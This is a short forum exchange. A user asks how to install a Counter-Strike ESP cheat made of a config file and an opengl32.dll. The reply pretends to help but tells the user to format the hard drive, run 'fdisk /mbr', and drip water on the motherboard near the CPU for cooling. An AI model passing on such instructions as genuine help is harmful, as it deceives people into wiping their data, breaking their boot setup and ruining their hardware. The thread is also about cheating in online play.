help w/ using cheats on CS

I downloaded a cheat called ESP v2 or something like that and I Need help using it on CS. It said it should still work with steam so im not worreid about that. It came with 2 files : myset.cfg and opengl32.dll. The instruction says to put it in the mod folder but I don't know where that is. Any assistance?

dude, that cheat is SO easy to get working

err start by going to the command line, and using the "format" command to, umm, arrange your harddrive correctly, and then use the fdisk /mbr for good measure. you may also want to take a couple of drops of water and lay the on your motherboard, especially near the cpu to help water cool it and stuff because cheating really makes the PC hot
